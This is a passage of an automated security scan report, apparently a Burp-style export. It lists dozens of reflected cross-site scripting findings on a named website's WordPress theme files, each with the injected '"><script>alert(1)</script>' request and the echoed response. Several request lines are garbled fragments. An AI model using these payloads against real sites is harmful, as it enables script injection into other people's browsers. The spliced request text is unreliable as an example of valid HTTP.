HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content4082c\"><script>alert(1)</script>1de928dbc8b /themes/powermta1/js/jquery-1.2.1.pack.js" />...[SNIP]...
2.120. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db75"><script>alert(1)</script>1a34ec9ff7d was submitted in the REST URL parameter 2. This input was echoed as 4db75\"><script>alert(1)</script>1a34ec9ff7d in the application's response.
Request
GET /wp-content/themes4db75"><script>alert(1)</script>1a34ec9ff7d /powermta1/js/jquery-1.2.1.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes4db75\"><script>alert(1)</script>1a34ec9ff7d /powermta1/js/jquery-1.2.1.pack.js" />...[SNIP]...
2.121. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9eb0"><script>alert(1)</script>72383f08ed2 was submitted in the REST URL parameter 3. This input was echoed as d9eb0\"><script>alert(1)</script>72383f08ed2 in the application's response.
Request
GET /wp-content/themes/powermta1d9eb0"><script>alert(1)</script>72383f08ed2 /js/jquery-1.2.1.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1d9eb0\"><script>alert(1)</script>72383f08ed2 /js/jquery-1.2.1.pack.js" />...[SNIP]...
2.122. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8a77"><script>alert(1)</script>0383053a194 was submitted in the REST URL parameter 4. This input was echoed as c8a77\"><script>alert(1)</script>0383053a194 in the application's response.
Request
GET /wp-content/themes/powermta1/jsc8a77"><script>alert(1)</script>0383053a194 /jquery-1.2.1.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/jsc8a77\"><script>alert(1)</script>0383053a194 /jquery-1.2.1.pack.js" />...[SNIP]...
2.123. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cd86"><script>alert(1)</script>7f0c7eb1413 was submitted in the REST URL parameter 5. This input was echoed as 5cd86\"><script>alert(1)</script>7f0c7eb1413 in the application's response.
Request
GET /wp-content/themes/powermta1/js/jquery-1.2.1.pack.js5cd86"><script>alert(1)</script>7f0c7eb1413 HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js5cd86\"><script>alert(1)</script>7f0c7eb1413 " />...[SNIP]...
2.124. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65264"><script>alert(1)</script>a412310c547 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 65264\"><script>alert(1)</script>a412310c547 in the application's response.
Request
GET /wp-content/themes/powermta1/js/jquery-1.2.1.pack.js?65264"><script>alert(1)</script>a412310c547 =1 HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js?65264\"><script>alert(1)</script>a412310c547 =1" />...[SNIP]...
2.125. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39310"><script>alert(1)</script>914a8e39803 was submitted in the REST URL parameter 1. This input was echoed as 39310\"><script>alert(1)</script>914a8e39803 in the application's response.
Request
GET /wp-content39310"><script>alert(1)</script>914a8e39803 /themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content39310\"><script>alert(1)</script>914a8e39803 /themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js" />...[SNIP]...
2.126. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e901"><script>alert(1)</script>1dae5d73edf was submitted in the REST URL parameter 2. This input was echoed as 7e901\"><script>alert(1)</script>1dae5d73edf in the application's response.
Request
GET /wp-content/themes7e901"><script>alert(1)</script>1dae5d73edf /powermta1/js/jquery-easing-compatibility.1.2.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes7e901\"><script>alert(1)</script>1dae5d73edf /powermta1/js/jquery-easing-compatibility.1.2.pack.js" />...[SNIP]...
2.127. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b85"><script>alert(1)</script>c97a251316 was submitted in the REST URL parameter 3. This input was echoed as 79b85\"><script>alert(1)</script>c97a251316 in the application's response.
Request
GET /wp-content/themes/powermta179b85"><script>alert(1)</script>c97a251316 /js/jquery-easing-compatibility.1.2.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta179b85\"><script>alert(1)</script>c97a251316 /js/jquery-easing-compatibility.1.2.pack.js" />...[SNIP]...
2.128. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae15"><script>alert(1)</script>d3cd4896678 was submitted in the REST URL parameter 4. This input was echoed as 4ae15\"><script>alert(1)</script>d3cd4896678 in the application's response.
Request
GET /wp-content/themes/powermta1/js4ae15"><script>alert(1)</script>d3cd4896678 /jquery-easing-compatibility.1.2.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/js4ae15\"><script>alert(1)</script>d3cd4896678 /jquery-easing-compatibility.1.2.pack.js" />...[SNIP]...
2.129. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58012"><script>alert(1)</script>4eea692d76f was submitted in the REST URL parameter 5. This input was echoed as 58012\"><script>alert(1)</script>4eea692d76f in the application's response.
Request
GET /wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js58012"><script>alert(1)</script>4eea692d76f HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c6981b17b32ddbb17f158a03e
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js58012\"><script>alert(1)</script>4eea692d76f " />...[SNIP]...
2.130. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dd7c"><script>alert(1)</script>1979aa4efb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2dd7c\"><script>alert(1)</script>1979aa4efb4 in the application's response.
Request
GET /wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js?2dd7c"><script>alert(1)</script>1979aa4efb4 =1 HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c6981b17b32ddbb17f158a03e
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js?2dd7c\"><script>alert(1)</script>1979aa4efb4 =1" />...[SNIP]...
2.131. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c9a4"><script>alert(1)</script>e7d0a6a8178 was submitted in the REST URL parameter 1. This input was echoed as 4c9a4\"><script>alert(1)</script>e7d0a6a8178 in the application's response.
Request
GET /wp-content4c9a4"><script>alert(1)</script>e7d0a6a8178 /themes/powermta1/js/jquery-easing.1.2.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content4c9a4\"><script>alert(1)</script>e7d0a6a8178 /themes/powermta1/js/jquery-easing.1.2.pack.js" />...[SNIP]...
2.132. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6b73"><script>alert(1)</script>63909903d9e was submitted in the REST URL parameter 2. This input was echoed as f6b73\"><script>alert(1)</script>63909903d9e in the application's response.
Request
GET /wp-content/themesf6b73"><script>alert(1)</script>63909903d9e /powermta1/js/jquery-easing.1.2.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themesf6b73\"><script>alert(1)</script>63909903d9e /powermta1/js/jquery-easing.1.2.pack.js" />...[SNIP]...
2.133. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7ac2"><script>alert(1)</script>ef59ef144f4 was submitted in the REST URL parameter 3. This input was echoed as b7ac2\"><script>alert(1)</script>ef59ef144f4 in the application's response.
Request
GET /wp-content/themes/powermta1b7ac2"><script>alert(1)</script>ef59ef144f4 /js/jquery-easing.1.2.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1b7ac2\"><script>alert(1)</script>ef59ef144f4 /js/jquery-easing.1.2.pack.js" />...[SNIP]...
2.134. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5c56"><script>alert(1)</script>129f6c95e98 was submitted in the REST URL parameter 4. This input was echoed as b5c56\"><script>alert(1)</script>129f6c95e98 in the application's response.
Request
GET /wp-content/themes/powermta1/jsb5c56"><script>alert(1)</script>129f6c95e98 /jquery-easing.1.2.pack.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/jsb5c56\"><script>alert(1)</script>129f6c95e98 /jquery-easing.1.2.pack.js" />...[SNIP]...
2.135. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ef60"><script>alert(1)</script>9c0b586ee8d was submitted in the REST URL parameter 5. This input was echoed as 2ef60\"><script>alert(1)</script>9c0b586ee8d in the application's response.
Request
GET /wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js2ef60"><script>alert(1)</script>9c0b586ee8d HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js2ef60\"><script>alert(1)</script>9c0b586ee8d " />...[SNIP]...
2.136. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6ea"><script>alert(1)</script>6d1ad765b2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab6ea\"><script>alert(1)</script>6d1ad765b2c in the application's response.
Request
GET /wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js?ab6ea"><script>alert(1)</script>6d1ad765b2c =1 HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js?ab6ea\"><script>alert(1)</script>6d1ad765b2c =1" />...[SNIP]...
2.137. http://www.powermta.port25.com/wp-content/themes/powermta1/scripts/rsv.js [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/scripts/rsv.js
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eb7d"><script>alert(1)</script>6dfb110f6b4 was submitted in the REST URL parameter 1. This input was echoed as 3eb7d\"><script>alert(1)</script>6dfb110f6b4 in the application's response.
Request
GET /wp-content3eb7d"><script>alert(1)</script>6dfb110f6b4 /themes/powermta1/scripts/rsv.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content3eb7d\"><script>alert(1)</script>6dfb110f6b4 /themes/powermta1/scripts/rsv.js" />...[SNIP]...
2.138. http://www.powermta.port25.com/wp-content/themes/powermta1/scripts/rsv.js [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/scripts/rsv.js
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 726f6"><script>alert(1)</script>e05f163a878 was submitted in the REST URL parameter 2. This input was echoed as 726f6\"><script>alert(1)</script>e05f163a878 in the application's response.
Request
GET /wp-content/themes726f6"><script>alert(1)</script>e05f163a878 /powermta1/scripts/rsv.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes726f6\"><script>alert(1)</script>e05f163a878 /powermta1/scripts/rsv.js" />...[SNIP]...
2.139. http://www.powermta.port25.com/wp-content/themes/powermta1/scripts/rsv.js [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/scripts/rsv.js
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fb50"><script>alert(1)</script>34a50ed9813 was submitted in the REST URL parameter 3. This input was echoed as 2fb50\"><script>alert(1)</script>34a50ed9813 in the application's response.
Request
GET /wp-content/themes/powermta12fb50"><script>alert(1)</script>34a50ed9813 /scripts/rsv.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta12fb50\"><script>alert(1)</script>34a50ed9813 /scripts/rsv.js" />...[SNIP]...
2.140. http://www.powermta.port25.com/wp-content/themes/powermta1/scripts/rsv.js [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/scripts/rsv.js
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44427"><script>alert(1)</script>9b7ea4d2eeb was submitted in the REST URL parameter 4. This input was echoed as 44427\"><script>alert(1)</script>9b7ea4d2eeb in the application's response.
Request
GET /wp-content/themes/powermta1/scripts44427"><script>alert(1)</script>9b7ea4d2eeb /rsv.js HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/scripts44427\"><script>alert(1)</script>9b7ea4d2eeb /rsv.js" />...[SNIP]...
2.141. http://www.powermta.port25.com/wp-content/themes/powermta1/scripts/rsv.js [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/scripts/rsv.js
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0c00"><script>alert(1)</script>7c31e38746c was submitted in the REST URL parameter 5. This input was echoed as b0c00\"><script>alert(1)</script>7c31e38746c in the application's response.
Request
GET /wp-content/themes/powermta1/scripts/rsv.jsb0c00"><script>alert(1)</script>7c31e38746c HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/scripts/rsv.jsb0c00\"><script>alert(1)</script>7c31e38746c " />...[SNIP]...
2.142. http://www.powermta.port25.com/wp-content/themes/powermta1/scripts/rsv.js [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/scripts/rsv.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43b7d"><script>alert(1)</script>e397849c24f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43b7d\"><script>alert(1)</script>e397849c24f in the application's response.
Request
GET /wp-content/themes/powermta1/scripts/rsv.js?43b7d"><script>alert(1)</script>e397849c24f =1 HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/scripts/rsv.js?43b7d\"><script>alert(1)</script>e397849c24f =1" />...[SNIP]...
2.143. http://www.powermta.port25.com/wp-content/themes/powermta1/style.css [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/style.css
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f351"><script>alert(1)</script>28071f3cb40 was submitted in the REST URL parameter 1. This input was echoed as 2f351\"><script>alert(1)</script>28071f3cb40 in the application's response.
Request
GET /wp-content2f351"><script>alert(1)</script>28071f3cb40 /themes/powermta1/style.css HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content2f351\"><script>alert(1)</script>28071f3cb40 /themes/powermta1/style.css" />...[SNIP]...
2.144. http://www.powermta.port25.com/wp-content/themes/powermta1/style.css [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/style.css
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94809"><script>alert(1)</script>17080239665 was submitted in the REST URL parameter 2. This input was echoed as 94809\"><script>alert(1)</script>17080239665 in the application's response.
Request
GET /wp-content/themes94809"><script>alert(1)</script>17080239665 /powermta1/style.css HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes94809\"><script>alert(1)</script>17080239665 /powermta1/style.css" />...[SNIP]...
2.145. http://www.powermta.port25.com/wp-content/themes/powermta1/style.css [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/style.css
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4afd"><script>alert(1)</script>e37f767f8b5 was submitted in the REST URL parameter 3. This input was echoed as d4afd\"><script>alert(1)</script>e37f767f8b5 in the application's response.
Request
GET /wp-content/themes/powermta1d4afd"><script>alert(1)</script>e37f767f8b5 /style.css HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1d4afd\"><script>alert(1)</script>e37f767f8b5 /style.css" />...[SNIP]...
2.146. http://www.powermta.port25.com/wp-content/themes/powermta1/style.css [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/wp-content/themes/powermta1/style.css
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c7a7"><script>alert(1)</script>03c8408a26e was submitted in the REST URL parameter 4. This input was echoed as 7c7a7\"><script>alert(1)</script>03c8408a26e in the application's response.
Request
GET /wp-content/themes/powermta1/style.css7c7a7"><script>alert(1)</script>03c8408a26e HTTP/1.1;q=0.7.port25.com/wp-content/themes/powermta1/images/favicon.icof2d81%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E9be443f7c69
Response
HTTP/1.1 404 Not Found.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... .port25.com/wp-content/themes/powermta1/style.css7c7a7\"><script>alert(1)</script>03c8408a26e " />...[SNIP]...
